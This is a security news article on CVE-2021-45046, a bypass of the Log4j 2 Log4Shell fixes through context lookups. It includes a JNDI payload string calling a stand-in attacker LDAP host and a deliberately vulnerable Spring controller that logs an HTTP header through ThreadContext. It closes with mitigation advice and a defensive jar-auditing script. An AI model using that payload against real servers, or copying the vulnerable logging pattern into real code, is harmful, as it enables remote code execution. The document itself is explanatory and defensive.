A new attack vector for Log4j 2 that bypasses the added protection

Another vulnerability has been identified in the implementation of JNDI lookups in the Log4j 2 library (CVE-2021-45046). It manifests despite the fixes added in release 2.15 and regardless of whether the "log4j2.formatMsgNoLookups" setting is used for protection. The problem is most dangerous for older versions of Log4j 2 that are protected only by the "formatMsgNoLookups" flag, since it makes it possible to bypass the protection against the previous vulnerability (Log4Shell, CVE-2021-44228) and execute attacker-controlled code on the server. For users of version 2.15, exploitation is limited to crashing the application through exhaustion of available resources.

The vulnerability manifests only on systems that use Context Lookups in log output, such as ${ctx:loginId}, or MDC (Thread Context Map) patterns such as %X, %mdc and %MDC. Exploitation comes down to arranging for data containing JNDI substitutions to reach the log when the application uses context lookups or MDC patterns in the rules that define how log output is formatted.

LunaSec researchers noted that for Log4j versions below 2.15 this vulnerability can be used as a new vector for the Log4Shell attack leading to code execution, provided that ThreadContext expressions containing external data are used in the log output, regardless of whether the protective flag "log4j2.formatMsgNoLookups" or the "%m{nolookups}" pattern is enabled.


The protection bypass comes down to the fact that, instead of substituting "${jndi:ldap://attacker.com/a}" directly, the expression arrives through the value of an intermediate variable that is used in the log output formatting rules. For example, if the context lookup ${ctx:apiversion} is used when writing to the log, the attack can be carried out by placing "${jndi:ldap://attacker.com/a}" into the value written to the apiversion variable. Example of vulnerable code (log4j2 configuration followed by the Spring controller that fills the ThreadContext; the snippet has been completed into a compilable class with the imports it needs):

    appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

    import org.apache.logging.log4j.*;
    import org.springframework.web.bind.annotation.*;

    @RestController
    public class ApiController {
        private static final Logger logger = LogManager.getLogger(ApiController.class);

        @GetMapping("/")
        public String index(@RequestHeader("X-Api-Version") String apiVersion) {
            // The value of the "X-Api-Version" HTTP header is placed into the ThreadContext (MDC)
            ThreadContext.put("apiversion", apiVersion);
            // When the line is written, the externally supplied apiversion value is
            // substituted for ${ctx:apiversion} in the layout pattern and evaluated
            logger.info("Received a request for API version");
            return "Hello, world!";
        }
    }

In Log4j version 2.15 the vulnerability can be used for DoS attacks: a value passed into ThreadContext causes a loop while the formatting pattern is being processed.


To block the vulnerability, updates 2.16 and 2.12.2 have been published. In the Log4j 2.16 branch, in addition to the fixes added in version 2.15 and the restriction of JNDI LDAP requests to "localhost", JNDI functionality is disabled entirely by default and support for message substitution patterns has been removed. As a protective measure it is also recommended to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").
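A defender auditing a fleet wants to know, for every log4j-core jar found, which version it reports and whether JndiLookup.class is still present, and to apply the class removal described above where an upgrade is not yet possible. The script below is an added example, not part of the article or of the Log4j project. It assumes the jar manifest carries an Implementation-Version attribute, treats 2.16.0 and later plus the 2.12.2 backport as fixed (the versions the article names), and builds a constructed stand-in jar in a temporary directory so that it runs offline.

```python
import os
import re
import tempfile
import zipfile

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
VERSION_RE = re.compile(r"^Implementation-Version:\s*(\S+)", re.M)


def parse_version(v):
    """'2.14.1' -> (2, 14, 1); non-numeric suffixes such as '-rc1' are ignored."""
    parts = []
    for p in v.split("."):
        m = re.match(r"\d+", p)
        parts.append(int(m.group(0)) if m else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def version_is_fixed(v):
    """True for the releases the article names as fixed: 2.16.0+ or the 2.12.2 backport."""
    t = parse_version(v)
    return t >= (2, 16, 0) or (2, 12, 2) <= t < (2, 13, 0)


def inspect_log4j_jar(path):
    """Report the manifest version and whether JndiLookup.class is still in the jar."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        version = None
        if "META-INF/MANIFEST.MF" in names:
            manifest = jar.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
            m = VERSION_RE.search(manifest)
            version = m.group(1) if m else None
    return {
        "version": version,
        "has_jndi_lookup": JNDI_LOOKUP_CLASS in names,
        "fixed_version": bool(version) and version_is_fixed(version),
    }


def remove_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class (what the article's zip -q -d command does)."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as src, zipfile.ZipFile(tmp, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(info, src.read(info.filename))
    os.replace(tmp, path)


def build_fixture_jar(directory, version="2.14.1"):
    """Constructed stand-in for a log4j-core jar (not a real artifact): a manifest and dummy class entries."""
    path = os.path.join(directory, "log4j-core-%s.jar" % version)
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF",
                     "Manifest-Version: 1.0\nImplementation-Version: %s\n" % version)
        jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")
        jar.writestr("org/apache/logging/log4j/core/lookup/StrLookup.class", b"\xca\xfe\xba\xbe")
    return path


def demo():
    """Inspect the fixture jar, strip JndiLookup.class, inspect again; returns both reports."""
    with tempfile.TemporaryDirectory() as d:
        jar = build_fixture_jar(d)
        before = inspect_log4j_jar(jar)
        remove_jndi_lookup(jar)
        after = inspect_log4j_jar(jar)
    return before, after


if __name__ == "__main__":
    for report in demo():
        print(report)
```

On a real host, point inspect_log4j_jar at every log4j-core-*.jar located by find or the package manager; a jar whose version is not fixed and which still contains JndiLookup.class needs either the upgrade or the class removal before it is considered mitigated. Jars nested inside fat jars or WAR files are not opened by this script and need a recursive pass.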

The appearance of updated packages can be tracked on the pages of the distributions (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) and of Java platform vendors (GitHub, Docker, Oracle, vmWare, Broadcom, Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, etc.).

Source: opennet.ru